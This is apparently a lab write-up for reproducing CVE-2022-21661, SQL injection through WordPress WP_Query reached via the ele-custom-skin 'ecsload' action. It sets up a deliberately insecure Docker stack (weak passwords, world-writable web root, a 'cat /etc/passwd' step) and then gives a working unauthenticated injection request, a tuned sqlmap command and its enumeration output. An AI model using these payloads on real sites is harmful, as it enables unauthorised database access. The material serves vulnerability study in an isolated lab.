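# Lab bootstrap: fetch the CVE-2022-21661 (WP_Query SQL injection) demo
# repository and pre-pull the deliberately old images the compose file
# below relies on. Use a throw-away host: the stack that follows ships
# public default passwords and a world-writable web root.
cd /tmp || exit 1
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
# Installed in the foreground (the original backgrounded it with "&"):
# "docker-compose up" further down must not race the package install.
# apt-get is used because "apt" warns that its CLI is not script-stable.
apt-get install -y docker-compose
# mysql:5.7 and wordpress:5.8.1 are pinned on purpose (the vulnerable core
# version under test); wordpress:cli is a floating tag and may differ
# between runs.
docker pull mysql:5.7
docker pull wordpress:5.8.1
docker pull wordpress:cli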
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii docker-compose 1.29.2-1 all define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661#
自定义 docker-compose.yml,修改后的文件命名为 Gdocker-compose.yml,内容如下:
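# Gdocker-compose.yml — deliberately vulnerable lab for CVE-2022-21661
# (SQL injection in WordPress core's WP_Query, reached in this lab through
# the ele-custom-skin plugin's "ecsload" AJAX action).
#
# Everything below is intentionally insecure for the lab: public default
# passwords, a world-writable web root, debug output enabled and a debug
# log written inside the web root. Run it on a throw-away host only.
# Both published ports are bound to 127.0.0.1 so the stack is not reachable
# from the network; if Burp / sqlmap run on another machine, reach it via
# an SSH tunnel (e.g. ssh -L 8000:127.0.0.1:8000 <host>) instead of
# opening the ports.
version: "3.3"
services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    ports:
      # loopback only: the credentials below are public knowledge
      - "127.0.0.1:33060:3306"
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    healthcheck:
      # "$$" escapes the dollar for docker-compose so the variables are
      # expanded by the container's shell. With a single "$", compose
      # substitutes them from the *host* environment at parse time, which
      # normally yields an empty user and password.
      test: mysqladmin ping -h 127.0.0.1 -u $$MYSQL_USER --password=$$MYSQL_PASSWORD
      start_period: 5s
      interval: 5s
      timeout: 5s
      retries: 55
  wordpress:
    depends_on:
      db:
        condition: service_healthy
    image: wordpress:5.8.1   # pinned: the vulnerable core version under test
    ports:
      # loopback only; the site URL set by "wp core install" below is
      # http://127.0.0.1:8000 and the curl/sqlmap requests use that Host.
      - "127.0.0.1:8000:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_TABLE_PREFIX: "wp_"
      WORDPRESS_DEBUG: 1
    volumes:
      - wp_data:/var/www/html
  wordpress-cli:
    # Provisioning container: installs WordPress, the plugin chain and a few
    # test users, then runs "bash" with a tty so it stays up and can be
    # attached to afterwards.
    depends_on:
      - db
      - wordpress
    image: wordpress:cli
    user: root            # needed for the chown/chmod of the shared web root
    stdin_open: true
    tty: true
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
    # Notes on the steps below (comments cannot go inside the folded scalar):
    #  - "sleep 3" is only a crude wait for the wordpress container; if
    #    "core install" fails with a DB/HTTP error, rerun this container.
    #  - admin/admin and the three extra users are deliberately weak.
    #  - "chmod -R 0777" makes the web root world-writable (lab only).
    #  - WP_DEBUG_LOG points inside the web root, so the log (including SQL
    #    errors) is presumably downloadable at http://127.0.0.1:8000/aab.log.
    #    The earlier "WP_DEBUG_LOG true" step was dropped: the path
    #    assignment right after it overwrote that value anyway.
    command: >
      /bin/sh -c '
      id;
      cat /etc/hosts;
      ip add;
      sleep 3;
      wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
      wp --allow-root plugin install elementor --version=3.5.0 --activate;
      wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
      wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
      wp --allow-root user create tom tom@tom.com --user_pass="weakpassword";
      wp --allow-root user create leo leo@leo.com --user_pass="strongpassword";
      wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
      chown -R 33:33 /var/www/html;
      chmod -R 0777 /var/www/html;
      cat /etc/passwd;
      wp config set WP_DEBUG true --raw --allow-root;
      wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
      wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
      bash;
      '
    volumes:
      - wp_data:/var/www/html
volumes:
  db_data:
  wp_data: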
# Alternative to the "elementor --version=3.5.0" line in the compose command
# above: 3.6.2 also works for this lab and, per the exploit-db reference
# below, additionally carries an authenticated RCE that can be tested alongside.
wp --allow-root plugin install elementor --version=3.6.2 --activate;
Elementor 3.6.2 也可以用于本环境;而且该版本本身还存在下面这个(需认证的)RCE 漏洞,可以一并测试:
#https://www.exploit-db.com/exploits/50882
#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
启动3个docker:
# Brings up db, wordpress and wordpress-cli; the cli container runs the
# provisioning commands from the compose file and then stays up in bash.
docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml up -d
查看日志:
# Follow the cli container's output to confirm "core install" and the plugin
# installs succeeded. The name uses compose v1's "<dir>_<service>_1" form;
# if it is not found (e.g. a newer "docker compose"), look it up with "docker ps".
docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;
mysql容器连接测试:
# Open a shell in the db container; the mysql command below is run *inside* it.
docker exec -it ssi-cve-2022-21661_db_1 bash
# Sanity check with the low-privilege application account (the one sqlmap
# later reports as "wordpress@%", not DBA). Passing --password on the command
# line exposes it to other processes' argument lists; acceptable in this lab,
# not on real hosts. The 33060 host mapping also allows the same check from
# the docker host with "-P 33060" if a mysql client is installed there.
mysql -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"
使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):
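# Baseline request copied from the repo's example.md. The tax_query "terms"
# array element is the injection point (the sqlmap request file below marks
# it with "1*"). No Cookie is sent, so this reaches admin-ajax.php without
# authentication. -x sends the request through Burp on 127.0.0.1:8080.
# The hard-coded "Content-Length: 287" header was dropped: curl derives it
# from --data-binary, and a stale manual value corrupts the request as soon
# as the payload is edited. -k was dropped too; it has no effect on plain
# HTTP.
curl -x http://127.0.0.1:8080/ -i --compressed -X POST \
  -H 'Host: 127.0.0.1:8000' \
  -H 'User-Agent: python-requests/2.28.1' \
  -H 'Accept-Encoding: gzip, deflate, br' \
  -H 'Accept: */*' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-binary 'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
  'http://127.0.0.1:8000/wp-admin/admin-ajax.php'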
http://127.0.0.1:8080/ 是 Burp Suite 2022 监听的 HTTP 代理,用于观察请求和响应;不需要观察时去掉 -x 参数即可直接请求目标。
祭出大杀器sqlmap:
rem Windows host side: run sqlmap against the lab through Burp (127.0.0.1:8080).
set cmdpath2024=c:\Python310\python
rem -r rr2024.txt   : raw request file with the injection point marked "1*" (see below)
rem --technique=E   : error-based only. Presumably works here because the compose
rem                   file enables WP_DEBUG_DISPLAY, so MySQL errors are echoed back.
rem --prefix/--suffix: "23) " likely closes the IN (...) list that tax_query builds
rem                   and "#" comments out the rest of the statement; inspect the
rem                   generated SQL in Burp if nothing is detected.
rem --dbms=mysql --threads=4 -vvv: skip DBMS fingerprinting, parallelize, show payloads.
rem --current-db --is-dba --dbs: enumeration only; no data is dumped here.
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap 1.5.7.7#dev , 支持python3.10
rr2024.txt 如下(注意两点:请求头与 body 之间必须有一个空行,下面的列表里可能被吞掉了;另外文件中的 Content-Length: 131 与这一行 body 的实际长度(约 185 字节)不符——sqlmap 会自行重算,但用其它工具重放该文件时需要修正):
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close
action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}
得到结果:
web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress
其它辅助参考资料:
https://github.com/daniel616/CVE-2022-21661-Demo
#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate
#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate
#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json
#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip
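# Fetch the hello-elementor theme versions used in the lab. The original
# "-k" (skip TLS certificate verification) was dropped: these zips get
# installed into the WordPress instance, so a MITM must not be able to swap
# them. -f keeps an HTTP error page from being saved as a .zip; -4 and -O
# are kept from the original (force IPv4, save under the URL's file name).
cd /tmp || exit 1
for ver in 2.1.0 2.5.0 2.7.0; do
  curl -f4O "https://downloads.wordpress.org/theme/hello-elementor.${ver}.zip"
done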
https://forum.butian.net/share/1324
漏洞简介
这是近期披露的一个 WordPress SQL 注入漏洞。它本身不是一个可以直接打的入口,而是 WordPress 核心函数 WP_Query(本例中是其 tax_query 处理)的漏洞;该函数被大量插件调用,因此危害面很大,前台和后台的入口都可能触发。在本文的环境中,触发点是 ele-custom-skin 插件的 ecsload AJAX 动作(admin-ajax.php),上面的 curl 请求没有携带任何 Cookie,即未认证即可到达。